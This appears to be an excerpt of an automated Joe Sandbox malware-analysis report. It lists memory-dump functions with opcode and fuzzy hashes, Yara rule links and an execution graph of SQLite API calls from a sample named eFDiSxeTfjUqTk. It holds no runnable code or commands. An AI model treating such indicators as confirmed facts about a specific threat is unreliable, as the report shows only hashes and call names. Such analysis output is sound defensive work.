                                                                                                    • Opcode Fuzzy Hash: b48776ead326f36cfa7bbce34c2dd7610da6e5945deb13a2d49889f946375c05
                                                                                                    • Instruction Fuzzy Hash: F811AF76504280CFDB12CF10E9C4B16BF71FB94314F2485A9DC094F216D336D95ACBA2
                                                                                                    Function 00A50170 Relevance: .1, Instructions: 55COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.409918211.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_a50000_eFDiSxeTfjUqTk.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: dfce38d6f3b421fd5a1e519c240c60b628366a01de7e1651b7d52b73451b2741
                                                                                                    • Instruction ID: 4a94039e1d651a380e677788c889dd0cf6082ed2a68b5a853eaf0cded6a5bacd
                                                                                                    • Opcode Fuzzy Hash: dfce38d6f3b421fd5a1e519c240c60b628366a01de7e1651b7d52b73451b2741
                                                                                                    • Instruction Fuzzy Hash: 6311D4B4D04209CFCB44DFA4D9589AEBBB6FF89302F20A569C809F7251EB705A41CF91
                                                                                                    Function 00A515A4 Relevance: .1, Instructions: 52COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.409918211.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_a50000_eFDiSxeTfjUqTk.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b4ee693773ba1a313c4f657486691b28006ee7dd960323c19f49f859d527046d
                                                                                                    • Instruction ID: 34643183be967a18cec788ee05c2ac008555cfeb610da0c0eb2225955b766789
                                                                                                    • Opcode Fuzzy Hash: b4ee693773ba1a313c4f657486691b28006ee7dd960323c19f49f859d527046d
                                                                                                    • Instruction Fuzzy Hash: 3B112874908218DFCBA4CF94C884BE8B7B9BF49305F2491AAD949AB285DB705A85DF00
                                                                                                    Function 00A50C08 Relevance: .0, Instructions: 47COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.409918211.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_a50000_eFDiSxeTfjUqTk.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 242f27f783ca7625eb470769c65cd37f4c762fdb5dc669e065f06701619ff5ea
                                                                                                    • Instruction ID: 90886c2ecba6c97e8a5d67a50bc749080311b7bb5d1fd7953688c36418c570cc
                                                                                                    • Opcode Fuzzy Hash: 242f27f783ca7625eb470769c65cd37f4c762fdb5dc669e065f06701619ff5ea
                                                                                                    • Instruction Fuzzy Hash: 1211A2B4D04209DFCB44DFA9D9456AEBBF5BF89301F20A16AC819E3311E7705A41DF90
                                                                                                    Function 00A519B3 Relevance: .0, Instructions: 39COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.409918211.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_a50000_eFDiSxeTfjUqTk.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 4409b70cfa0c5f4ffff126fcf25dc0f4aa9ca826e1bdccdb22bafafc2a53d411
                                                                                                    • Instruction ID: 5665574349c66bbe32ec6b13f5c8229e4c22d81131eb41ce2374620d0a873ea5
                                                                                                    • Opcode Fuzzy Hash: 4409b70cfa0c5f4ffff126fcf25dc0f4aa9ca826e1bdccdb22bafafc2a53d411
                                                                                                    • Instruction Fuzzy Hash: A011AE35949228CFDB20CF64CD90FE9BBB6BB09305F1081C9E809A7291C7329E85CF40
                                                                                                    Function 00A51647 Relevance: .0, Instructions: 35COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.409918211.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_a50000_eFDiSxeTfjUqTk.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a00b56fdb14f3330bb4f83bd2f8c3b994b63a2fd9654f71d52866aa90d85fa15
                                                                                                    • Instruction ID: 3e748bebc769d26457fbd662f72cbb5b97025f61875acdb0878ab8dd0949ebe5
                                                                                                    • Opcode Fuzzy Hash: a00b56fdb14f3330bb4f83bd2f8c3b994b63a2fd9654f71d52866aa90d85fa15
                                                                                                    • Instruction Fuzzy Hash: 7B01D2389082188FCB55CFA4C890BECBBB6BB49301F24919AD909A7252D7305A95CF40
                                                                                                    Function 00A5188A Relevance: .0, Instructions: 33COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.409918211.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_a50000_eFDiSxeTfjUqTk.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 2bfcd0986c62e39e5030529707e13a9f54c25420b9e9ebfcd7750a5e47d54766
                                                                                                    • Instruction ID: 376231cfafa83713a0916d7f169842a9ce9c6e22ca1e3c156f239314fae401d7
                                                                                                    • Opcode Fuzzy Hash: 2bfcd0986c62e39e5030529707e13a9f54c25420b9e9ebfcd7750a5e47d54766
                                                                                                    • Instruction Fuzzy Hash: 48F04935809399CFCB11CF20DC847F8BBB5BB4A316F2491DAC809AA396D7305A89DF00
                                                                                                    Function 00A51AB9 Relevance: .0, Instructions: 32COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.409918211.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_a50000_eFDiSxeTfjUqTk.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 04b1cf80995d6d7db8b06c97b9bece5005e19971a5d4aeca6d3bd323394b2450
                                                                                                    • Instruction ID: 4584ed6612d25a4ba7bf8da4edc958f41077c7309e50949975a4b1731b69ce87
                                                                                                    • Opcode Fuzzy Hash: 04b1cf80995d6d7db8b06c97b9bece5005e19971a5d4aeca6d3bd323394b2450
                                                                                                    • Instruction Fuzzy Hash: 1CF03C74808118CFDB50CF24C485BF8B7B9AB05301F244099D80EAB242C7355A89CF50
                                                                                                    Function 00A51168 Relevance: .0, Instructions: 31COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.409918211.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_a50000_eFDiSxeTfjUqTk.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 075618f1a24ea76e14266cb64d8d150cdc3367bbb4a4b460cb99ea341d9c0692
                                                                                                    • Instruction ID: b4a5546a718115198b5b840b0e4a26d0e39f73d73f11328d137f66304b44ff9b
                                                                                                    • Opcode Fuzzy Hash: 075618f1a24ea76e14266cb64d8d150cdc3367bbb4a4b460cb99ea341d9c0692
                                                                                                    • Instruction Fuzzy Hash: A1F03A74D09108EFCB04DFB4E9547BCBFB5BB8A305F1092A9C80AA3291D7705A04DF05
                                                                                                    Function 00A517EA Relevance: .0, Instructions: 25COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.409918211.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_a50000_eFDiSxeTfjUqTk.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b4138aa4c713e32cb1d2d3d36a1efd8fd0ccff77532fee295c51d1b5d4e09e43
                                                                                                    • Instruction ID: 594a85faa2603a2200b7179c8252abe1774859a4bb15b840d4704fecc2c345ba
                                                                                                    • Opcode Fuzzy Hash: b4138aa4c713e32cb1d2d3d36a1efd8fd0ccff77532fee295c51d1b5d4e09e43
                                                                                                    • Instruction Fuzzy Hash: C6F0B235904228EFCB60CFA4CC84BECBBB9FB49315F2480999449A3251DB326A95DF50
                                                                                                    Function 00A518F0 Relevance: .0, Instructions: 25COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.409918211.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_a50000_eFDiSxeTfjUqTk.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: be6797301612788c19b8564a82ad5d065cabc0920d04f697974f523b60f4cbe6
                                                                                                    • Instruction ID: 6a2af0d27f3493d251d792f76fa28b99efe025b8caef68957c1033f4f5a92669
                                                                                                    • Opcode Fuzzy Hash: be6797301612788c19b8564a82ad5d065cabc0920d04f697974f523b60f4cbe6
                                                                                                    • Instruction Fuzzy Hash: 64F08234914114CFCB20CF64C9846E8BBB4FB49315F1542EAC80EA7392D7345E86CF10
                                                                                                    Function 00A51921 Relevance: .0, Instructions: 24COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.409918211.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_a50000_eFDiSxeTfjUqTk.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 81be611fa9c42f74886ad67e1cf4337778ba2b38cbcf119ab0185ffdbc65d27e
                                                                                                    • Instruction ID: a62754bfe1a947226476e47f95de77f7f10087fb51fd824813abf1104f9f41ef
                                                                                                    • Opcode Fuzzy Hash: 81be611fa9c42f74886ad67e1cf4337778ba2b38cbcf119ab0185ffdbc65d27e
                                                                                                    • Instruction Fuzzy Hash: ACF05E39815154CFC760CF64C984AE8BBB1BB85364F2442DAC429AB3D5D7319A85CF50
                                                                                                    Function 00A500C8 Relevance: .0, Instructions: 23COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.409918211.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_a50000_eFDiSxeTfjUqTk.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: cedf0ddd73059f0718763975524e1e1bfe23f6c04c23665eede8300c01ebafb5
                                                                                                    • Instruction ID: 8b298e8434228074b7a4b8d68e26f8e915ac16977635246ad624bdcb511c6351
                                                                                                    • Opcode Fuzzy Hash: cedf0ddd73059f0718763975524e1e1bfe23f6c04c23665eede8300c01ebafb5
                                                                                                    • Instruction Fuzzy Hash: 26F06D78D08248AFCB00CFA4E455AACBFB0EF49305F1041DED841973A2C7714A00DF41
                                                                                                    Function 00A50081 Relevance: .0, Instructions: 21COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.409918211.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_a50000_eFDiSxeTfjUqTk.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 6e3bd3b75bf193927ea70ada40d766157e8ed6fb564d7d4569b387f6605eb654
                                                                                                    • Instruction ID: b649d1744577cc411d21437982df85a7391820c8d998b56ada746771b700a3a5
                                                                                                    • Opcode Fuzzy Hash: 6e3bd3b75bf193927ea70ada40d766157e8ed6fb564d7d4569b387f6605eb654
                                                                                                    • Instruction Fuzzy Hash: D4E04F74D04148EFDB14CFA5E855BADBF70EB85305F1081AADC41A2391D7710A45DF40
                                                                                                    Function 00A51A66 Relevance: .0, Instructions: 21COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.409918211.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_a50000_eFDiSxeTfjUqTk.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 596ffd29f68e64ebc14f684d481ae81dabe463e916d376a86d8c2ea90d1ae90a
                                                                                                    • Instruction ID: 4e48245d84b01ac03e1433213229ea2c4268aa08f751988558814d4233547a39
                                                                                                    • Opcode Fuzzy Hash: 596ffd29f68e64ebc14f684d481ae81dabe463e916d376a86d8c2ea90d1ae90a
                                                                                                    • Instruction Fuzzy Hash: 43E0E5759441189FEB40CF64C880BE8BBB9EB48305F248099E909A3250C6369A86CF10
                                                                                                    Function 00A503A8 Relevance: .0, Instructions: 20COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.409918211.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_a50000_eFDiSxeTfjUqTk.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: fa1c8fadfba95806f536b0b6494501ee2f40b9de711565e571171e5d39789d35
                                                                                                    • Instruction ID: 837092170e8c097c72f1853f3391b842bedc631d820d1ca4fa6ba6d2e19da227
                                                                                                    • Opcode Fuzzy Hash: fa1c8fadfba95806f536b0b6494501ee2f40b9de711565e571171e5d39789d35
                                                                                                    • Instruction Fuzzy Hash: 9CE0C2B4C15288EFDB15DFB4B4217AC7FB0EF4130AF1141EDD800AA292D7714A85DB04
                                                                                                    Function 00A50948 Relevance: .0, Instructions: 18COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.409918211.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_a50000_eFDiSxeTfjUqTk.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 72068cab16c1dfe2426d06d6d1425f66582e439b26c0b5f7efa5589cb0741240
                                                                                                    • Instruction ID: e7039682eee90ff1e9b013db7a11e028a3bc215e6829f539e84f1b1c9f94ab5b
                                                                                                    • Opcode Fuzzy Hash: 72068cab16c1dfe2426d06d6d1425f66582e439b26c0b5f7efa5589cb0741240
                                                                                                    • Instruction Fuzzy Hash: 69E0B674910208DFD744EFB8E544A5CBBF4AB48305F2041A9D909D7361E7319A44DB41
                                                                                                    Function 00A50A38 Relevance: .0, Instructions: 17COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.409918211.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_a50000_eFDiSxeTfjUqTk.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 3fde860f80e4eb0bb3a671426fed6dc38126ffad8b6edda5a4aab8fcdd0831ac
                                                                                                    • Instruction ID: b0ba02442f19549a2c44aacc09adf943d18b37ed8cad0dc3eef7ec9d76309cf9
                                                                                                    • Opcode Fuzzy Hash: 3fde860f80e4eb0bb3a671426fed6dc38126ffad8b6edda5a4aab8fcdd0831ac
                                                                                                    • Instruction Fuzzy Hash: BCD05E70D4930CEBCB04DFA4E801AADBB78BB86305F2061A8DC0423241D7301E44E795
                                                                                                    Function 00A50090 Relevance: .0, Instructions: 16COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.409918211.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_a50000_eFDiSxeTfjUqTk.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e2072a3627ac6e03d3d60c679df359fd2bb7b824d22dec2c9c098ade53e7b3f2
                                                                                                    • Instruction ID: 18f7e77262e056b11c3db144f4438028ebaf0045dc18d2cf9206629d3b56e94b
                                                                                                    • Opcode Fuzzy Hash: e2072a3627ac6e03d3d60c679df359fd2bb7b824d22dec2c9c098ade53e7b3f2
                                                                                                    • Instruction Fuzzy Hash: 99E0E234D04208EBCB04DFA8E8156ACBBB5AB88305F1091AADC44A3390D7755A44DB85
                                                                                                    Function 00A50BC0 Relevance: .0, Instructions: 16COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.409918211.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_a50000_eFDiSxeTfjUqTk.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 62e90200bcd77703a52ca2900c004742d730f7c7180281bc768bc7babe399043
                                                                                                    • Instruction ID: 5dc572e04155ceb0ba12b2bbd1777bcdb35beec9c22f0d3db5ce97873caec8d5
                                                                                                    • Opcode Fuzzy Hash: 62e90200bcd77703a52ca2900c004742d730f7c7180281bc768bc7babe399043
                                                                                                    • Instruction Fuzzy Hash: 3AD05EB094D1889FD724CBA4A866BADFF24AB92309F54019ED409562D1D6710A44CB12
                                                                                                    Function 00A51138 Relevance: .0, Instructions: 16COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.409918211.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_a50000_eFDiSxeTfjUqTk.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 704727f52d2a0565444cb50f4988a4699e92ed48c7e7c065c87a6cad7e1ede83
                                                                                                    • Instruction ID: 3cbcb5d1d586335efab2c6574b1b111e1db0c201b54e4b3ec884022307471065
                                                                                                    • Opcode Fuzzy Hash: 704727f52d2a0565444cb50f4988a4699e92ed48c7e7c065c87a6cad7e1ede83
                                                                                                    • Instruction Fuzzy Hash: 30D05E30904208DBCB04DFA4E90466DBB7AFB86306F1062A8C80473350CB711E44DB85
                                                                                                    Function 00A50B58 Relevance: .0, Instructions: 16COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.409918211.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_a50000_eFDiSxeTfjUqTk.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: f01ae860a7f7c8573ad9585133dc3eeff1203e6e259e20aa1d15a15401014588
                                                                                                    • Instruction ID: 668bc68f46aa9a00ff610cc38cca991a2562bcc89e01723a917bf4c5c9530c24
                                                                                                    • Opcode Fuzzy Hash: f01ae860a7f7c8573ad9585133dc3eeff1203e6e259e20aa1d15a15401014588
                                                                                                    • Instruction Fuzzy Hash: EBD01730D10208EFCB44EFB8E84569DBBF8AB44306F1041A9880893340E7309B44CB81
                                                                                                    Function 00A50FC8 Relevance: .0, Instructions: 14COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.409918211.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_a50000_eFDiSxeTfjUqTk.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 70ebb8809cfa16d19d9cf25da6a03faeb345dcef84e9157e5ee4f37bcd1dd294
                                                                                                    • Instruction ID: 0938a3b322746e8b55e01a56c1a8d6b771aec756a83648c41d8fbd2e4f90cd9c
                                                                                                    • Opcode Fuzzy Hash: 70ebb8809cfa16d19d9cf25da6a03faeb345dcef84e9157e5ee4f37bcd1dd294
                                                                                                    • Instruction Fuzzy Hash: 32D05E31810208EBC704DFA8E80569CBB74AB44306F0011A8C804A3350D7715E88CB81
                                                                                                    Function 00A50BD0 Relevance: .0, Instructions: 13COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.409918211.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_a50000_eFDiSxeTfjUqTk.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 6ad94969695ba298249af1ba913508074b8c30ad86175d3dc68ec0cef8083784
                                                                                                    • Instruction ID: 4031a87cb3c4294e6d3e331d12687a35e4396052d2c0a186df1252fe84670eb4
                                                                                                    • Opcode Fuzzy Hash: 6ad94969695ba298249af1ba913508074b8c30ad86175d3dc68ec0cef8083784
                                                                                                    • Instruction Fuzzy Hash: 25C0123051510C9BD714DFA5E815B6D776CE781319F401199D80853250DB715E00D795
                                                                                                    Function 00A5066D Relevance: .0, Instructions: 11COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.409918211.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_a50000_eFDiSxeTfjUqTk.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 79af83536e8da47ab4900c2e6889cae83c0d8e5e81ee8ddd876e25a1262ed42d
                                                                                                    • Instruction ID: b3fbc8973783674f610587ef1dfa8427b5ba066847d2828f8b660291269747de
                                                                                                    • Opcode Fuzzy Hash: 79af83536e8da47ab4900c2e6889cae83c0d8e5e81ee8ddd876e25a1262ed42d
                                                                                                    • Instruction Fuzzy Hash: FBC09B35A55008DFCB409BC4F4054FCB735FBCA323F212061D50DA2010C7301D188E41

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:1.4%
                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                    Signature Coverage:0.2%
                                                                                                    Total number of Nodes:409
                                                                                                    Total number of Limit Nodes:47
                                                                                                    execution_graph 30918 61e183f0 GetSystemInfo sqlite3_vfs_register sqlite3_vfs_register sqlite3_vfs_register sqlite3_vfs_register 30919 61e0b501 30920 61e0b5f7 30919->30920 30922 61e0b509 30919->30922 30921 61e0b568 30929 61e0b23a 30921->30929 30922->30920 30922->30921 30923 61e0b23a 120 API calls 30922->30923 30923->30921 30925 61e0b583 30925->30920 30926 61e0b23a 120 API calls 30925->30926 30927 61e0b5c1 30926->30927 30927->30920 30928 61e0b23a 120 API calls 30927->30928 30928->30920 30930 61e0b242 30929->30930 30931 61e0b32e 30929->30931 30932 61e0b28b 30930->30932 30933 61e0b23a 120 API calls 30930->30933 30935 61e5e127 30930->30935 30931->30925 30932->30925 30933->30930 30936 61e5e46c 30935->30936 30949 61e5e15e 30935->30949 30936->30930 30939 61e0b23a 120 API calls 30939->30949 30940 61e5e60c 30940->30936 30966 61e29b17 7 API calls 30940->30966 30941 61e5e453 30961 61e29b17 7 API calls 30941->30961 30947 61e5e257 30964 61e29b17 7 API calls 30947->30964 30949->30936 30949->30939 30949->30941 30949->30947 30950 61e5e4f3 30949->30950 30951 61e141fa sqlite3_mutex_leave sqlite3_mutex_enter sqlite3_free sqlite3_mutex_enter sqlite3_mutex_leave 30949->30951 30953 61e5e883 30949->30953 30954 61e544da 12 API calls 30949->30954 30956 61e5e0e3 30949->30956 30960 61e30cf3 7 API calls 30949->30960 30962 61e54775 120 API calls 30949->30962 30963 61e29d00 7 API calls 30949->30963 30950->30936 30950->30940 30950->30947 30952 61e2a192 7 API calls 30950->30952 30965 61e12175 sqlite3_mutex_leave sqlite3_mutex_enter sqlite3_free sqlite3_mutex_enter sqlite3_mutex_leave 30950->30965 30951->30949 30952->30950 30967 61e29b17 7 API calls 30953->30967 30954->30949 30957 61e5e0f9 30956->30957 30968 61e5de8a 30957->30968 30960->30949 30961->30936 30962->30949 30963->30949 30964->30936 30965->30950 30966->30936 30967->30936 31001 61e5da09 30968->31001 30972 61e5deb9 30980 61e5df79 30972->30980 31006 61e03d95 sqlite3_stricmp sqlite3_stricmp 30972->31006 30974 61e5dee4 30979 61e5df00 sqlite3_strnicmp 30974->30979 30984 61e5df5d 30974->30984 31000 61e5dfcd 30974->31000 30975 61e5e0b4 31017 61e29b17 7 API calls 30975->31017 30976 61e5e08d 31016 61e29b17 7 API calls 30976->31016 30981 61e5df23 30979->30981 30979->31000 30980->30949 31007 61e04501 sqlite3_stricmp 30981->31007 30983 61e5df2e 30983->31000 31008 61e126cb 9 API calls 30983->31008 30984->30980 30986 61e5dfc4 30984->30986 30987 61e5dfd2 30984->30987 30984->31000 31009 61e0f9d1 sqlite3_free 30986->31009 31010 61e2184f 6 API calls 30987->31010 30990 61e5dfff 31011 61e2184f 6 API calls 30990->31011 30992 61e5e00a 31012 61e2184f 6 API calls 30992->31012 30994 61e5e01e 31013 61e30d97 9 API calls 30994->31013 30996 61e5e039 30996->30980 31014 61e29b17 7 API calls 30996->31014 30998 61e5e05b 31015 61e0f9d1 sqlite3_free 30998->31015 31000->30975 31000->30976 31000->30980 31002 61e5da23 31001->31002 31003 61e5da1b 31001->31003 31002->30980 31005 61e03c9e sqlite3_stricmp 31002->31005 31018 61e5d94b 31003->31018 31005->30972 31006->30974 31007->30983 31008->30984 31009->31000 31010->30990 31011->30992 31012->30994 31013->30996 31014->30998 31015->31000 31016->30980 31017->30980 31019 61e5d97c 31018->31019 31020 61e5d9be 31019->31020 31022 61e5d9bc 31019->31022 31027 61e5d697 31019->31027 31054 61e1246f sqlite3_free sqlite3_free sqlite3_free 31019->31054 31021 61e5d697 110 API calls 31020->31021 31020->31022 31024 61e5d9d8 31021->31024 31022->31002 31024->31022 31055 61e1246f sqlite3_free sqlite3_free sqlite3_free 31024->31055 31056 61e6ada7 31027->31056 31030 61e5d72a 31030->31019 31032 61e5d746 31033 61e5d780 31032->31033 31083 61e3cdc1 31032->31083 31042 61e5d79f 31033->31042 31103 61e13866 sqlite3_mutex_leave sqlite3_mutex_try sqlite3_mutex_enter 31033->31103 31036 61e5d75d 31036->31033 31037 61e5d76a 31036->31037 31102 61e115fd sqlite3_free 31037->31102 31039 61e5d82e 31105 61e115fd sqlite3_free 31039->31105 31040 61e5d80f 31040->31039 31043 61e5d847 31040->31043 31042->31039 31042->31040 31104 61e13ba7 sqlite3_mutex_leave sqlite3_mutex_try sqlite3_mutex_enter 31042->31104 31106 61e30cf3 7 API calls 31043->31106 31047 61e5d87d sqlite3_exec 31107 61e0f9d1 sqlite3_free 31047->31107 31049 61e5d8d3 31050 61e5d8e1 31049->31050 31108 61e5d5bd 9 API calls 31049->31108 31052 61e5d842 31050->31052 31109 61e135c5 6 